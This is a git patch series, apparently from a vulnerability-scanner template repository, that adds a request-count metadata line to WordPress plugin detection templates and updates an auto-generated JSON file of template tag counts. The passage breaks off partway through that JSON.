a/http/technologies/wordpress/plugins/wp-migrate-db.yaml b/http/technologies/wordpress/plugins/wp-migrate-db.yaml index f89f1a20b3..d570be07bf 100644 --- a/http/technologies/wordpress/plugins/wp-migrate-db.yaml +++ b/http/technologies/wordpress/plugins/wp-migrate-db.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-migrate-db/ metadata: + max-request: 1 plugin_namespace: wp-migrate-db wpscan: https://wpscan.com/plugin/wp-migrate-db tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml index 01fb12d0ad..ee05e3add8 100644 --- a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml +++ b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-multibyte-patch/ metadata: + max-request: 1 plugin_namespace: wp-multibyte-patch wpscan: https://wpscan.com/plugin/wp-multibyte-patch tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-optimize.yaml b/http/technologies/wordpress/plugins/wp-optimize.yaml index 1773857e15..df2487955f 100644 --- a/http/technologies/wordpress/plugins/wp-optimize.yaml +++ b/http/technologies/wordpress/plugins/wp-optimize.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-optimize/ metadata: + max-request: 1 plugin_namespace: wp-optimize wpscan: https://wpscan.com/plugin/wp-optimize tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-pagenavi.yaml b/http/technologies/wordpress/plugins/wp-pagenavi.yaml index bcd1509c68..79ff01211c 100644 --- a/http/technologies/wordpress/plugins/wp-pagenavi.yaml +++ b/http/technologies/wordpress/plugins/wp-pagenavi.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-pagenavi/ metadata: + max-request: 1 plugin_namespace: wp-pagenavi wpscan: https://wpscan.com/plugin/wp-pagenavi tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-reset.yaml b/http/technologies/wordpress/plugins/wp-reset.yaml index c6aca20a60..23414b3d1d 100644 --- a/http/technologies/wordpress/plugins/wp-reset.yaml +++ b/http/technologies/wordpress/plugins/wp-reset.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-reset/ metadata: + max-request: 1 plugin_namespace: wp-reset wpscan: https://wpscan.com/plugin/wp-reset tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-rollback.yaml b/http/technologies/wordpress/plugins/wp-rollback.yaml index 810fc82cde..0178c8e9fb 100644 --- a/http/technologies/wordpress/plugins/wp-rollback.yaml +++ b/http/technologies/wordpress/plugins/wp-rollback.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-rollback/ metadata: + max-request: 1 plugin_namespace: wp-rollback wpscan: https://wpscan.com/plugin/wp-rollback tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml index 783d381ed8..a04ddc6003 100644 --- a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml +++ b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-sitemap-page/ metadata: + max-request: 1 plugin_namespace: wp-sitemap-page wpscan: https://wpscan.com/plugin/wp-sitemap-page tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-smushit.yaml b/http/technologies/wordpress/plugins/wp-smushit.yaml index 8bdc600063..2ead906817 100644 --- a/http/technologies/wordpress/plugins/wp-smushit.yaml +++ b/http/technologies/wordpress/plugins/wp-smushit.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-smushit/ metadata: + max-request: 1 plugin_namespace: wp-smushit wpscan: https://wpscan.com/plugin/wp-smushit tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-statistics.yaml b/http/technologies/wordpress/plugins/wp-statistics.yaml index ab61cc0338..dedd2e23b6 100644 --- a/http/technologies/wordpress/plugins/wp-statistics.yaml +++ b/http/technologies/wordpress/plugins/wp-statistics.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-statistics/ metadata: + max-request: 1 plugin_namespace: wp-statistics wpscan: https://wpscan.com/plugin/wp-statistics tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-super-cache.yaml b/http/technologies/wordpress/plugins/wp-super-cache.yaml index 5f6fbc1f75..03cd7137a8 100644 --- a/http/technologies/wordpress/plugins/wp-super-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-super-cache.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-super-cache/ metadata: + max-request: 1 plugin_namespace: wp-super-cache wpscan: https://wpscan.com/plugin/wp-super-cache tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-user-avatar.yaml b/http/technologies/wordpress/plugins/wp-user-avatar.yaml index d67150d038..a68d4b7d78 100644 --- a/http/technologies/wordpress/plugins/wp-user-avatar.yaml +++ b/http/technologies/wordpress/plugins/wp-user-avatar.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-user-avatar/ metadata: + max-request: 1 plugin_namespace: wp-user-avatar wpscan: https://wpscan.com/plugin/wp-user-avatar tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml index beeba7ca69..bf9dfc3ad8 100644 --- a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wpcf7-recaptcha/ metadata: + max-request: 1 plugin_namespace: wpcf7-recaptcha wpscan: https://wpscan.com/plugin/wpcf7-recaptcha tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml index c225df7bfd..47911a86a5 100644 --- a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wpcf7-redirect/ metadata: + max-request: 1 plugin_namespace: wpcf7-redirect wpscan: https://wpscan.com/plugin/wpcf7-redirect tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wpforms-lite.yaml b/http/technologies/wordpress/plugins/wpforms-lite.yaml index aaad04cb76..1c25b6f488 100644 --- a/http/technologies/wordpress/plugins/wpforms-lite.yaml +++ b/http/technologies/wordpress/plugins/wpforms-lite.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wpforms-lite/ metadata: + max-request: 1 plugin_namespace: wpforms-lite wpscan: https://wpscan.com/plugin/wpforms-lite tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wps-hide-login.yaml b/http/technologies/wordpress/plugins/wps-hide-login.yaml index ff750a7d2a..b36317acd8 100644 --- a/http/technologies/wordpress/plugins/wps-hide-login.yaml +++ b/http/technologies/wordpress/plugins/wps-hide-login.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wps-hide-login/ metadata: + max-request: 1 plugin_namespace: wps-hide-login wpscan: https://wpscan.com/plugin/wps-hide-login tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml index f1e7595ccd..5eb35dd17e 100644 --- a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml +++ b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wpvivid-backuprestore/ metadata: + max-request: 1 plugin_namespace: wpvivid-backuprestore wpscan: https://wpscan.com/plugin/wpvivid-backuprestore tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml index 4b2769ee46..ceb2b8d600 100644 --- a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml +++ b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/yith-woocommerce-wishlist/ metadata: + max-request: 1 plugin_namespace: yith-woocommerce-wishlist wpscan: https://wpscan.com/plugin/yith-woocommerce-wishlist tags: tech,wordpress,wp-plugin,top-100,top-200 From f3dda4672ed3c9dac9f430f465e9e02fcac101da Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sun, 9 Jul 2023 09:54:38 +0000 Subject: [PATCH 550/609] Auto Generated Templates Stats [Sun Jul 9 09:54:38 UTC 2023] :robot: --- TEMPLATES-STATS.json | 2 +- TEMPLATES-STATS.md | 6898 +++++++++++++++++++++--------------------- TOP-10.md | 14 +- 3 files changed, 3458 insertions(+), 3456 deletions(-) diff --git a/TEMPLATES-STATS.json b/TEMPLATES-STATS.json index 5592f6b22e..8344ac28f8 100644 --- a/TEMPLATES-STATS.json +++ b/TEMPLATES-STATS.json @@ -1 +1 @@ -{"tags":[{"name":"cve","count":1949},{"name":"panel","count":958},{"name":"wordpress","count":802},{"name":"exposure","count":719},{"name":"xss","count":695},{"name":"wp-plugin","count":691},{"name":"osint","count":652},{"name":"tech","count":618},{"name":"edb","count":598},{"name":"lfi","count":558},{"name":"misconfig","count":474},{"name":"cve2021","count":434},{"name":"rce","count":430},{"name":"cve2022","count":417},{"name":"packetstorm","count":369},{"name":"wpscan","count":350},{"name":"wp","count":303},{"name":"unauth","count":285},{"name":"cve2020","count":242},{"name":"token-spray","count":240},{"name":"authenticated","count":233},{"name":"sqli","count":210},{"name":"top-200","count":208},{"name":"osint-social","count":207},{"name":"kev","count":200},{"name":"config","count":197},{"name":"","count":194},{"name":"oast","count":171},{"name":"token","count":160},{"name":"apache","count":153},{"name":"cve2018","count":151},{"name":"default-login","count":150},{"name":"iot","count":150},{"name":"cve2019","count":149},{"name":"file","count":147},{"name":"login","count":140},{"name":"joomla","count":136},{"name":"redirect","count":116},{"name":"cve2023","count":116},{"name":"cve2010","count":112},{"name":"files","count":101},{"name":"top-100","count":100},{"name":"network","count":100},{"name":"router","count":97},{"name":"ssrf","count":96},{"name":"cms","count":95},{"name":"auth-bypass","count":81},{"name":"devops","count":77},{"name":"cve2017","count":77},{"name":"takeover","count":73},{"name":"intrusive","count":72},{"name":"install","count":70},{"name":"disclosure","count":68},{"name":"oracle","count":65},{"name":"seclists","count":60},{"name":"detect","count":58},{"name":"oss","count":57},{"name":"cve2015","count":54},{"name":"google","count":53},{"name":"cisco","count":53},{"name":"cve2016","count":52},{"name":"adobe","count":52},{"name":"fileupload","count":49},{"name":"atlassian","count":47},{"name":"logs","count":46},{"name":"tenable","count":46},{"name":"vmware","count":45},{"name":"osint-gaming","count":45},{"name":"aem","count":44},{"name":"vulhub","count":44},{"name":"debug","count":44},{"name":"plugin","count":43},{"name":"osint-porn","count":42},{"name":"cve2014","count":42},{"name":"hackerone","count":42},{"name":"osint-hobby","count":42},{"name":"huntr","count":41},{"name":"generic","count":37},{"name":"traversal","count":37},{"name":"springboot","count":36},{"name":"jira","count":36},{"name":"kubernetes","count":35},{"name":"aws","count":35},{"name":"osint-misc","count":35},{"name":"injection","count":34},{"name":"listing","count":33},{"name":"deserialization","count":31},{"name":"misc","count":31},{"name":"osint-coding","count":29},{"name":"sap","count":29},{"name":"cnvd","count":29},{"name":"log4j","count":28},{"name":"osint-tech","count":28},{"name":"gitlab","count":27},{"name":"php","count":27},{"name":"microsoft","count":26},{"name":"proxy","count":26},{"name":"jndi","count":25},{"name":"cve2012","count":25},{"name":"fuzz","count":25},{"name":"api","count":25},{"name":"osint-shopping","count":24},{"name":"osint-images","count":24},{"name":"firewall","count":24},{"name":"osint-finance","count":24},{"name":"manageengine","count":24},{"name":"osint-business","count":24},{"name":"zoho","count":23},{"name":"stored-xss","count":23},{"name":"amazon","count":23},{"name":"k8s","count":23},{"name":"c2","count":23},{"name":"wp-theme","count":22},{"name":"tomcat","count":21},{"name":"cloud","count":21},{"name":"msf","count":21},{"name":"ibm","count":21},{"name":"weblogic","count":21},{"name":"fortinet","count":20},{"name":"cicd","count":20},{"name":"jenkins","count":19},{"name":"rukovoditel","count":19},{"name":"github","count":19},{"name":"ssl","count":19},{"name":"camera","count":19},{"name":"dns","count":19},{"name":"struts","count":19},{"name":"admin","count":19},{"name":"dlink","count":19},{"name":"lfr","count":18},{"name":"osint-music","count":18},{"name":"wavlink","count":18},{"name":"ftp","count":18},{"name":"service","count":18},{"name":"ir","count":17},{"name":"cve2011","count":17},{"name":"nginx","count":16},{"name":"cve2009","count":16},{"name":"osint-blog","count":16},{"name":"xxe","count":16},{"name":"printer","count":16},{"name":"backup","count":16},{"name":"magento","count":15},{"name":"cve2008","count":15},{"name":"citrix","count":15},{"name":"status","count":15},{"name":"java","count":15},{"name":"hp","count":15},{"name":"android","count":15},{"name":"audit","count":14},{"name":"osint-health","count":14},{"name":"woocommerce","count":14},{"name":"zyxel","count":14},{"name":"confluence","count":14},{"name":"cve2013","count":14},{"name":"nodejs","count":14},{"name":"domainmod","count":14},{"name":"jboss","count":14},{"name":"osint-art","count":14},{"name":"mail","count":14},{"name":"osint-dating","count":13},{"name":"login-check","count":13},{"name":"laravel","count":13},{"name":"tokens","count":13},{"name":"abstractapi","count":13},{"name":"npm","count":13},{"name":"azure","count":13},{"name":"osint-political","count":13},{"name":"fortigate","count":13},{"name":"creds-stuffing","count":13},{"name":"cuppa","count":13},{"name":"airflow","count":12},{"name":"drupal","count":12},{"name":"enum","count":12},{"name":"rails","count":12},{"name":"ruby","count":12},{"name":"vpn","count":12},{"name":"git","count":12},{"name":"auth","count":12},{"name":"netgear","count":12},{"name":"grafana","count":12},{"name":"microweber","count":12},{"name":"webserver","count":12},{"name":"ruijie","count":12},{"name":"netsweeper","count":12},{"name":"graphql","count":12},{"name":"backdoor","count":12},{"name":"kafka","count":12},{"name":"dashboard","count":12},{"name":"online-fire-reporting","count":11},{"name":"phpmyadmin","count":11},{"name":"xstream","count":11},{"name":"cnvd2021","count":11},{"name":"coldfusion","count":11},{"name":"cisa","count":11},{"name":"dell","count":11},{"name":"osint-video","count":11},{"name":"sonicwall","count":11},{"name":"setup","count":11},{"name":"docker","count":11},{"name":"ssh","count":10},{"name":"ssti","count":10},{"name":"symfony","count":10},{"name":"headless","count":10},{"name":"thinkphp","count":10},{"name":"django","count":10},{"name":"digitalocean","count":10},{"name":"jolokia","count":10},{"name":"solarview","count":10},{"name":"spring","count":10},{"name":"zimbra","count":10},{"name":"dedecms","count":10},{"name":"db","count":10},{"name":"glpi","count":10},{"name":"zabbix","count":9},{"name":"firebase","count":9},{"name":"wso2","count":9},{"name":"alibaba","count":9},{"name":"windows","count":9},{"name":"installer","count":9},{"name":"prometheus","count":9},{"name":"versa","count":9},{"name":"opencats","count":9},{"name":"node","count":9},{"name":"bypass","count":9},{"name":"pfsense","count":9},{"name":"redis","count":9},{"name":"gitea","count":9},{"name":"cache","count":9},{"name":"iis","count":9},{"name":"kube","count":9},{"name":"sitecore","count":9},{"name":"vcenter","count":9},{"name":"scada","count":9},{"name":"fastjson","count":9},{"name":"osint-news","count":9},{"name":"ecology","count":8},{"name":"metadata","count":8},{"name":"hms","count":8},{"name":"oauth","count":8},{"name":"elasticsearch","count":8},{"name":"spotweb","count":8},{"name":"crlf","count":8},{"name":"keys","count":8},{"name":"icewarp","count":8},{"name":"default-page","count":8},{"name":"emerge","count":8},{"name":"config-audit","count":8},{"name":"recon","count":8},{"name":"vbulletin","count":8},{"name":"unauthenticated","count":8},{"name":"smtp","count":8},{"name":"jetbrains","count":8},{"name":"cisco-switch","count":8},{"name":"console","count":8},{"name":"bucket","count":8},{"name":"ognl","count":8},{"name":"mirai","count":8},{"name":"exchange","count":8},{"name":"atom","count":8},{"name":"solr","count":8},{"name":"cnvd2020","count":8},{"name":"druid","count":8},{"name":"odoo","count":7},{"name":"samsung","count":7},{"name":"fortios","count":7},{"name":"shopify","count":7},{"name":"nagiosxi","count":7},{"name":"sophos","count":7},{"name":"websphere","count":7},{"name":"avtech","count":7},{"name":"huawei","count":7},{"name":"vms","count":7},{"name":"go","count":7},{"name":"manager","count":7},{"name":"nagios","count":7},{"name":"squirrelmail","count":7},{"name":"ofbiz","count":7},{"name":"ec2","count":7},{"name":"blind","count":7},{"name":"seeyon","count":7},{"name":"error","count":7},{"name":"gogs","count":7},{"name":"maps","count":7},{"name":"malware","count":7},{"name":"lucee","count":6},{"name":"artica","count":6},{"name":"magmi","count":6},{"name":"elfinder","count":6},{"name":"liferay","count":6},{"name":"minio","count":6},{"name":"jetty","count":6},{"name":"jamf","count":6},{"name":"mongodb","count":6},{"name":"bigip","count":6},{"name":"microstrategy","count":6},{"name":"s3","count":6},{"name":"newrelic","count":6},{"name":"activemq","count":6},{"name":"keycloak","count":6},{"name":"solarwinds","count":6},{"name":"jeecg","count":6},{"name":"nexus","count":6},{"name":"kubelet","count":6},{"name":"symantec","count":6},{"name":"filemanager","count":6},{"name":"opensis","count":6},{"name":"slack","count":6},{"name":"database","count":6},{"name":"tikiwiki","count":6},{"name":"cobbler","count":6},{"name":"pmb","count":6},{"name":"rconfig","count":6},{"name":"secret","count":6},{"name":"plesk","count":6},{"name":"moodle","count":6},{"name":"python","count":6},{"name":"leak","count":6},{"name":"doctor-appointment-system","count":6},{"name":"openvpn","count":6},{"name":"fpd","count":6},{"name":"zhiyuan","count":6},{"name":"asana","count":5},{"name":"hikvision","count":5},{"name":"firmware","count":5},{"name":"hashicorp","count":5},{"name":"facebook","count":5},{"name":"akamai","count":5},{"name":"cacti","count":5},{"name":"square","count":5},{"name":"awstats","count":5},{"name":"circarlife","count":5},{"name":"vrealize","count":5},{"name":"microfocus","count":5},{"name":"rseenet","count":5},{"name":"typo3","count":5},{"name":"74cms","count":5},{"name":"apisix","count":5},{"name":"server","count":5},{"name":"heroku","count":5},{"name":"adminer","count":5},{"name":"openemr","count":5},{"name":"rfi","count":5},{"name":"prestashop","count":5},{"name":"gocd","count":5},{"name":"paypal","count":5},{"name":"hybris","count":5},{"name":"parallels","count":5},{"name":"geoserver","count":5},{"name":"nacos","count":5},{"name":"kkfileview","count":5},{"name":"elastic","count":5},{"name":"cockpit","count":5},{"name":"resin","count":5},{"name":"sql","count":5},{"name":"caucho","count":5},{"name":"strapi","count":5},{"name":"metinfo","count":5},{"name":"fatpipe","count":5},{"name":"asp","count":5},{"name":"storage","count":5},{"name":"carrental","count":5},{"name":"avaya","count":5},{"name":"avideo","count":5},{"name":"ruckus","count":5},{"name":"dropbear","count":4},{"name":"mailchimp","count":4},{"name":"nosqli","count":4},{"name":"centos","count":4},{"name":"sonarqube","count":4},{"name":"kentico","count":4},{"name":"stripe","count":4},{"name":"seagate","count":4},{"name":"flink","count":4},{"name":"mostracms","count":4},{"name":"pentaho","count":4},{"name":"prtg","count":4},{"name":"hpe","count":4},{"name":"pixie","count":4},{"name":"couchdb","count":4},{"name":"photo","count":4},{"name":"redmine","count":4},{"name":"cloudflare","count":4},{"name":"age-encryption","count":4},{"name":"codeigniter","count":4},{"name":"oa","count":4},{"name":"grav","count":4},{"name":"kibana","count":4},{"name":"umbraco","count":4},{"name":"goanywhere","count":4},{"name":"bmc","count":4},{"name":"powerjob","count":4},{"name":"sendgrid","count":4},{"name":"aura","count":4},{"name":"ldap","count":4},{"name":"mostra","count":4},{"name":"arcgis","count":4},{"name":"jellyfin","count":4},{"name":"cnvd2019","count":4},{"name":"nextjs","count":4},{"name":"ampache","count":4},{"name":"qdpm","count":4},{"name":"linkerd","count":4},{"name":"yeswiki","count":4},{"name":"postmessage","count":4},{"name":"phpinfo","count":4},{"name":"horde","count":4},{"name":"concrete","count":4},{"name":"javascript","count":4},{"name":"osint-archived","count":4},{"name":"candidats","count":4},{"name":"xmlrpc","count":4},{"name":"httpserver","count":4},{"name":"mikrotik","count":4},{"name":"froxlor","count":4},{"name":"zte","count":4},{"name":"gnuboard","count":4},{"name":"wcs","count":4},{"name":"royalevent","count":4},{"name":"puppet","count":4},{"name":"httpd","count":4},{"name":"terramaster","count":4},{"name":"panos","count":4},{"name":"hoteldruid","count":4},{"name":"search","count":4},{"name":"roxy","count":4},{"name":"tenda","count":4},{"name":"elementor","count":4},{"name":"tls","count":4},{"name":"artifactory","count":4},{"name":"kevinlab","count":4},{"name":"webshell","count":4},{"name":"telesquare","count":4},{"name":"openfire","count":4},{"name":"axigen","count":4},{"name":"aspose","count":4},{"name":"mlflow","count":4},{"name":"mautic","count":4},{"name":"thinkcmf","count":4},{"name":"pie-register","count":4},{"name":"springcloud","count":4},{"name":"voip","count":4},{"name":"sangfor","count":4},{"name":"bitbucket","count":4},{"name":"zend","count":4},{"name":"jupyter","count":4},{"name":"ems","count":4},{"name":"log","count":4},{"name":"telerik","count":4},{"name":"newstatpress","count":4},{"name":"ebs","count":4},{"name":"rabbitmq","count":4},{"name":"consul","count":4},{"name":"webmin","count":4},{"name":"dolibarr","count":4},{"name":"express","count":4},{"name":"spark","count":4},{"name":"beyondtrust","count":4},{"name":"phppgadmin","count":4},{"name":"hongdian","count":4},{"name":"churchcrm","count":4},{"name":"cve2007","count":4},{"name":"mysql","count":4},{"name":"cve2005","count":4},{"name":"kfm","count":3},{"name":"blockchain","count":3},{"name":"yonyou","count":3},{"name":"jeesns","count":3},{"name":"adafruit","count":3},{"name":"rlm","count":3},{"name":"axis","count":3},{"name":"sharepoint","count":3},{"name":"hsphere","count":3},{"name":"totolink","count":3},{"name":"movable","count":3},{"name":"clusterengine","count":3},{"name":"rocketchat","count":3},{"name":"actuator","count":3},{"name":"postman","count":3},{"name":"synology","count":3},{"name":"carel","count":3},{"name":"cnvd2022","count":3},{"name":"labkey","count":3},{"name":"key","count":3},{"name":"angular","count":3},{"name":"pypi","count":3},{"name":"xerox","count":3},{"name":"pega","count":3},{"name":"waf","count":3},{"name":"samba","count":3},{"name":"eshop","count":3},{"name":"modem","count":3},{"name":"superadmin","count":3},{"name":"dreambox","count":3},{"name":"lotus","count":3},{"name":"targa","count":3},{"name":"jwt","count":3},{"name":"mantisbt","count":3},{"name":"cas","count":3},{"name":"globalprotect","count":3},{"name":"zeroshell","count":3},{"name":"webadmin","count":3},{"name":"processwire","count":3},{"name":"pyload","count":3},{"name":"securepoint","count":3},{"name":"sony","count":3},{"name":"unifi","count":3},{"name":"aria","count":3},{"name":"rancher","count":3},{"name":"postgresql","count":3},{"name":"jfrog","count":3},{"name":"figma","count":3},{"name":"ampps","count":3},{"name":"geowebserver","count":3},{"name":"smb","count":3},{"name":"forum","count":3},{"name":"voipmonitor","count":3},{"name":"trendnet","count":3},{"name":"backdrop","count":3},{"name":"buffalo","count":3},{"name":"mobileiron","count":3},{"name":"aptus","count":3},{"name":"epson","count":3},{"name":"poms","count":3},{"name":"teamcity","count":3},{"name":"axis2","count":3},{"name":"netlify","count":3},{"name":"digitalrebar","count":3},{"name":"nuuo","count":3},{"name":"rubygems","count":3},{"name":"empirecms","count":3},{"name":"sugarcrm","count":3},{"name":"password","count":3},{"name":"telegram","count":3},{"name":"chamilo","count":3},{"name":"graylog","count":3},{"name":"influxdb","count":3},{"name":"steve","count":3},{"name":"r-seenet","count":3},{"name":"twitter","count":3},{"name":"lansweeper","count":3},{"name":"cluster","count":3},{"name":"zerof","count":3},{"name":"loytec","count":3},{"name":"kingsoft","count":3},{"name":"rackn","count":3},{"name":"fileman","count":3},{"name":"kavita","count":3},{"name":"telnet","count":3},{"name":"credential","count":3},{"name":"bigant","count":3},{"name":"octobercms","count":3},{"name":"webalizer","count":3},{"name":"webcam","count":3},{"name":"splunk","count":3},{"name":"dos","count":3},{"name":"purchase-order-management-system","count":3},{"name":"trixbox","count":3},{"name":"harbor","count":3},{"name":"thinfinity","count":3},{"name":"openbmcs","count":3},{"name":"3cx","count":3},{"name":"linux","count":3},{"name":"asus","count":3},{"name":"matrix","count":3},{"name":"ueditor","count":3},{"name":"dubbo","count":3},{"name":"drawio","count":3},{"name":"etcd","count":3},{"name":"redash","count":3},{"name":"dom","count":3},{"name":"fanwei","count":3},{"name":"netdata","count":3},{"name":"monstra","count":3},{"name":"saltstack","count":3},{"name":"ivanti","count":3},{"name":"fanruan","count":3},{"name":"pip","count":3},{"name":"bitrix","count":3},{"name":"nuget","count":3},{"name":"metersphere","count":3},{"name":"wbce","count":3},{"name":"gateway","count":3},{"name":"apollo","count":3},{"name":"nortek","count":3},{"name":"webkul-qloapps","count":3},{"name":"airtable","count":3},{"name":"discourse","count":3},{"name":"getsimple","count":3},{"name":"subrion","count":3},{"name":"dzzoffice","count":3},{"name":"panabit","count":3},{"name":"dotcms","count":3},{"name":"intercom","count":3},{"name":"glassfish","count":3},{"name":"mcafee","count":3},{"name":"pulsar","count":3},{"name":"wordfence","count":3},{"name":"flexvnf","count":3},{"name":"selea","count":3},{"name":"selenium","count":3},{"name":"shiro","count":3},{"name":"ansible","count":3},{"name":"linksys","count":3},{"name":"proftpd","count":3},{"name":"sitemap","count":3},{"name":"sysaid","count":3},{"name":"segment","count":3},{"name":"rat","count":3},{"name":"mapbox","count":3},{"name":"sftp","count":3},{"name":"mongo","count":3},{"name":"tableau","count":3},{"name":"axway","count":3},{"name":"purchase-order","count":3},{"name":"webmail","count":3},{"name":"listserv","count":3},{"name":"circleci","count":3},{"name":"mailgun","count":3},{"name":"openai","count":3},{"name":"sentry","count":3},{"name":"magnolia","count":3},{"name":"nuxtjs","count":3},{"name":"payara","count":3},{"name":"spip","count":3},{"name":"temenos","count":3},{"name":"messaging","count":3},{"name":"swagger","count":3},{"name":"openam","count":3},{"name":"idrac","count":3},{"name":"lighttpd","count":3},{"name":"fuelcms","count":3},{"name":"weiphp","count":3},{"name":"gradle","count":3},{"name":"bruteforce","count":3},{"name":"thruk","count":3},{"name":"qnap","count":3},{"name":"yii","count":3},{"name":"servicenow","count":3},{"name":"metabase","count":3},{"name":"graph","count":3},{"name":"openstack","count":3},{"name":"httpbin","count":3},{"name":"superset","count":3},{"name":"finecms","count":3},{"name":"webpagetest","count":2},{"name":"openssh","count":2},{"name":"eris","count":2},{"name":"tiny","count":2},{"name":"relatedposts","count":2},{"name":"eyesofnetwork","count":2},{"name":"xiaomi","count":2},{"name":"contao","count":2},{"name":"websocket","count":2},{"name":"ispy","count":2},{"name":"atmail","count":2},{"name":"glowroot","count":2},{"name":"natshell","count":2},{"name":"gibbon","count":2},{"name":"opentsdb","count":2},{"name":"xampp","count":2},{"name":"dynamicweb","count":2},{"name":"gespage","count":2},{"name":"session","count":2},{"name":"bamboo","count":2},{"name":"wamp","count":2},{"name":"smartstore","count":2},{"name":"algolia","count":2},{"name":"glances","count":2},{"name":"airtame","count":2},{"name":"woocommerce-for-japan","count":2},{"name":"scan","count":2},{"name":"emby","count":2},{"name":"teampass","count":2},{"name":"opsview","count":2},{"name":"virtualui","count":2},{"name":"acrolinx","count":2},{"name":"apereo","count":2},{"name":"iconfinder","count":2},{"name":"redhat","count":2},{"name":"fortiap","count":2},{"name":"ilo","count":2},{"name":"rsa","count":2},{"name":"env","count":2},{"name":"fortiweb","count":2},{"name":"ngrok","count":2},{"name":"ambari","count":2},{"name":"cve2001","count":2},{"name":"ixcache","count":2},{"name":"pascom","count":2},{"name":"xceedium","count":2},{"name":"virustotal","count":2},{"name":"traefik","count":2},{"name":"akkadian","count":2},{"name":"tornado","count":2},{"name":"favicon","count":2},{"name":"ourphp","count":2},{"name":"beanstalk","count":2},{"name":"jitsi","count":2},{"name":"aruba","count":2},{"name":"weather","count":2},{"name":"cloudinary","count":2},{"name":"empire","count":2},{"name":"vigorconnect","count":2},{"name":"homeassistant","count":2},{"name":"spacelogic","count":2},{"name":"ecoa","count":2},{"name":"mojoportal","count":2},{"name":"dribbble","count":2},{"name":"commax","count":2},{"name":"tplink","count":2},{"name":"tasmota","count":2},{"name":"plastic","count":2},{"name":"openwrt","count":2},{"name":"codemeter","count":2},{"name":"pbootcms","count":2},{"name":"memory","count":2},{"name":"datadog","count":2},{"name":"modern-events-calendar-lite","count":2},{"name":"blms","count":2},{"name":"netflix","count":2},{"name":"synopsys","count":2},{"name":"gitbook","count":2},{"name":"hostheader-injection","count":2},{"name":"gophish","count":2},{"name":"workspaceone","count":2},{"name":"nextcloud","count":2},{"name":"utm","count":2},{"name":"etherpad","count":2},{"name":"ad","count":2},{"name":"espeasy","count":2},{"name":"reolink","count":2},{"name":"nordex","count":2},{"name":"itop","count":2},{"name":"jsp","count":2},{"name":"javamelody","count":2},{"name":"bitly","count":2},{"name":"lenovo","count":2},{"name":"shell","count":2},{"name":"jsf","count":2},{"name":"hasura","count":2},{"name":"corebos","count":2},{"name":"imap","count":2},{"name":"backupbuddy","count":2},{"name":"wapples","count":2},{"name":"paytm-payments","count":2},{"name":"forcepoint","count":2},{"name":"ametys","count":2},{"name":"js","count":2},{"name":"loqate","count":2},{"name":"totemomail","count":2},{"name":"docs","count":2},{"name":"trello","count":2},{"name":"dokuwiki","count":2},{"name":"motorola","count":2},{"name":"netsus","count":2